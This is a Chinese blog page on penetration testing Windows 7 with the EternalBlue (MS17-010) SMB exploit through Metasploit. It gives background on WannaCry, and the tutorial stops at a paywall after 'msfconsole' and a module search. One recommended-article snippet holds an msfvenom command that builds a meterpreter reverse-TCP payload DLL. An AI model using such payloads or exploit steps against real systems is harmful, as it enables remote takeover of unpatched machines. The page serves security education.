永恒之蓝windows7 下的渗透测试

最新推荐文章于 2024-05-31 07:23:48 发布
最新推荐文章于 2024-05-31 07:23:48 发布
阅读量1.3k 收藏 9
点赞数 1
分类专栏: 漏洞测试 文章标签: 漏洞测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Yu_csdnstory/article/details/102558662
版权
漏洞介绍

永恒之蓝是影子经纪人黑客组织攻破美国NSA黑客组织后公布的漏洞工具之一。

2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之蓝”工具,“永恒之蓝”利用Windows系统的SMB漏洞可以获取系统最高权限。5月12日,不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,英国、俄罗斯、整个欧洲以及中国国内多个高校校内网、大型企业内网和政府机构专网中招,被勒索支付高额赎金才能解密恢复文件。

代号 MS17-010

window版本为(windowsxp-windows server20012)
这里的测试版为windows7 企业版,运用工具msf,namp.
测试攻击机为kali linux ,测试机为windows7 旗舰版
linux版本下还没测试,稍后补上。

实现条件
  • 部署了存在漏洞的samba协议的版本,并对外开启445端口
  • 匿名访问用户对文件有可读权限
  • 需要知道共享目录的物理漏洞
过程如下

首先打开kali下的msfconsole

msfconsole


search 17-010

可能会出现如下的情况

Module database cach

最低0.47元/天 解锁文章
舞动的獾
关注
  • 1
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
关于win7新系统不能永恒之渗透和 Meterpreter出现stdapi_sys_power_exitwindows的一些小见解
qq_47077502的博客
04-11 1655
解决新win7不能永恒之扫描和Meterpreter不能重启和关机的问题
永恒之(ms17010)漏洞检测工具
04-19
在司徒西大神易语言ms17010漏洞检测源码上稍做修改,并做成了批处理,可以单机也可以网段批量检测永恒之漏洞。优点是体积小,扫描准确。缺点是扫描速度较慢。 使用方法: 此程序为易语言开发,如被误报病毒,可以将文件从隔离区恢复,添加信任。 下载后假设文件解压放在D盘 运行方式: 一、直接打开ms17010目录,运行“点我运行.bat”。如果运行报错 “The system cannot write to the specified device”,用以下方式运行。 二、 1.1 Win键+R键,打开运行,输入:cmd 2.1 在终端输入:cd /d d:\ms17010 3.1 测试本机:ms17010pc.exe 127.0.0.1 测试远程单机:ms17010pc.exe 目的IP (注意命令和IP之间有个空格) 3.2 网段批量测试:ms17010.exe 目的网段 例如:ms17010.exe 192.168.188.0/24 (注意命令和IP之间有个空格)
Kali--MSF-永恒之详解(复现、演示、远程、后门、加壳、修复)
最新发布
dzqxwzoe的博客
05-31 1021
永恒之(EternalBlue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日,不法分子通过改造“永恒之”制作了wannacry程序,使全世界大范围内遭受了该程序,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。但不过在该程序出来不久就被微软通过打补丁修复了。为了维持操作系统的安全,我们能做到的是及时更新,安装补丁,关闭不必要的服务和端口。
二、永恒之漏洞
qq_59235193的博客
02-02 339
本次测试主要是利用永恒之漏洞对windows7进行控制利用,掌握Metaploit工具的使用,知道永恒之的漏洞利用原理。永恒之Windows的SMB服务处理SMB v1请求时发生的漏洞,这个漏洞导致攻击者在目标系统上可以执行任意代码。通过永恒之漏洞会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
【ms17-010】永恒之漏洞复现
leekos的博客,分享web安全相关知识~
04-04 1766
因为只要掌握MSF的使用方法,每个人都可以使用MSF来攻击那些未打过补丁或者刚刚打过补丁的漏洞。(MSF)是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。首先我们先在攻击机上使用nmap扫一下该网段主机的存活情况。扫描出来了漏洞,接着我们需要使用工具利用漏洞。这个时候我们已经成功了,远程命令执行。的主机开启,并且显示了开放的端口号。设置完成之后,就可以开始攻击了,使用。分析了相关信息后,我们就可以使用。命令可以查看可以使用哪些命令。(靶机的ip地址),使用。
永恒之Windows10版初探
crowsec
03-15 1224
永恒之(ms17-010)通过TCP端口445和139来利用SMBv1和NBT中的远程代码执行漏洞,恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。相关的cve有:CVE-2017-0145、CVE-2017-0146、CVE-2017-0147、CVE-2017-0148。基本上我们搜索永恒之漏洞复现,99%的师傅选择的都是Windows7或者。
渗透基础笔记+作业(永恒之复现)
09-08
MS17-010,也称为“永恒之”,是一个著名的漏洞,主要影响Windows操作系统,尤其是Windows 7。复现环境通常包括攻击机(如Kali Linux)和靶机(如Windows 7)。工具如Nmap用于网络扫描,Metasploit则作为渗透框架...
永恒之测试.docx
07-23
Metasploit 是一个开源的渗透测试框架,可以用来模拟攻击和漏洞检测。我们将使用 Metasploit 来模拟攻击目标主机。首先,启动 Metasploit 控制台:`msfconsole`。然后,使用 `search ms17-010` 命令来查找相关的...
永恒之ms17_010方程式漏洞利用工具.rar
12-03
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.***.*** LPORT=4**** -f dll > x64.dll,reverse或者bind方式,替换到目录下,执行第一个检测安装backdoor,第二个选项卡attack就可以了。...
渗透测试培训介绍
07-26
视频可能介绍了如何利用Windows漏洞,如MS17-010(永恒之)来实现远程代码执行。 远控技术在渗透测试中扮演着关键角色。远程桌面协议(RDP)、SSH、VNC等都是常见的远控方式,它们允许测试人员在远程位置控制目标...
永恒之漏洞复现(ms17-010)
good good study
01-20 2万+
Metasploit Framework(MSF)是一款开源安全漏洞检测工具,附带数千个已知的软件漏洞,并保持持续更新。Metasploit可以用来信息收集、漏洞探测、漏洞利用等渗透测试的全流程,被安全社区冠以“可以黑掉整个宇宙”之名。刚开始的Metasploit是采用Perl语言编写的,但是再后来的新版中,改成了用Ruby语言编写的了。在kali中,自带了Metasploit工具。
永恒之检测工具
09-06
简单易用,小巧无毒,可以对大段IP进行扫描,也可以指定IP
永恒之检测工具MS17-010漏洞扫描工具 (全网段)
10-05
MS17-010漏洞扫描工具,在公司,或网吧,机器多的可以直接扫描 可直接输入指定的服务器,或客机扫描
永恒之漏洞检测工具
10-10
永恒之漏洞检测工具,用于扫描网络环境是否存在MS17-010漏洞。打开工具后输入ip或者ip网段(如:要检测172.16.21.1-172.16.21.254网段的设备就在里面输入:172.16.21.1/24)就可以检测设备是否有MS17-010漏洞,及时更新,以免勒索病毒入侵。
windows永恒之漏洞复现
weixin_48182463的博客
09-26 82
永恒之是指2017年4月14日晚,黑客团体Shadow Brokers(影子经纪人)公布一大批网络攻击工具,其中包含“永恒之”工具,“永恒之”利用Windows系统的SMB漏洞可以获取系统最高权限。恶意代码会扫描开放445文件共享端口的Windows机器,无需用户任何操作,只要开机上网,不法分子就能在电脑和服务器中植入勒索软件、远程控制木马、虚拟货币挖矿机等恶意程序。
kali上使用msf渗透win7(永恒之操作复现)初学者指南
weixin_45596770的博客
04-18 1万+
首先开篇先放出我使用的kali 与 win7 的网盘链接: 大家VMware上新建虚拟机即可~ 简单介绍一个Metasploit,一个免费的、开源的渗透测试框架,kali上可以直接使用~ 1. Metasploit初始化 在使用之前我们需要对Metasploit进行初始化,并启动: 终端窗口的命令行输入如下命令 systemctl start postgresql systemctl enable postgresql 启动专用的数据库,并设置为每次开机自动启动 msfconsole 或者 点击kali
使用永恒之(MS17-010)漏洞入侵windows7
weixin_34303897的博客
07-02 1193
永恒之简介 前几天,被勒索病毒(Wannacry)刷屏了,这个病毒是大家知道了备份文件的重要性,当然,我是不怕什么病毒的,因为我是一天备份一次文件,而且微云一份,坚果云,移动硬盘一份,就算被黑了又能怎样,最多花个一天时间装个系统,配置一下系统。而且我是不用垃圾windows的,linux百毒不侵,而且我的系统是天天更新。所以说被黑了...
永恒之漏洞利用及攻击
热门推荐
wwl012345的博客
04-20 9万+
一、基础知识介绍: 1.何为永恒之? 永恒之(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎...
Metasploit的Docker安装及其Eternal Blue(永恒之渗透实现
Mi1k7ea
08-11 7694
在Docker上pull下来的msf是默认已带有ms17_010_eternalblue利用模块的,这里就简单地演示一遍该模块来获取win7的shell。 Pull并安装msf容器: 先查找docker上的Metasploit镜像: docker search metasploit 选择第一个pull就好: docker pull linuxkonsult/kali-metasp
永恒之漏洞渗透测试win7参考文献
06-12
以下是关于永恒之漏洞渗透测试Win7系统的参考文献: 1. "永恒之"漏洞渗透测试实战,张威,信息安全与通信保密,2018年第12期。 2. Windows EternalBlue漏洞攻击分析及渗透测试实战,李阳,电子产品世界,2018...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值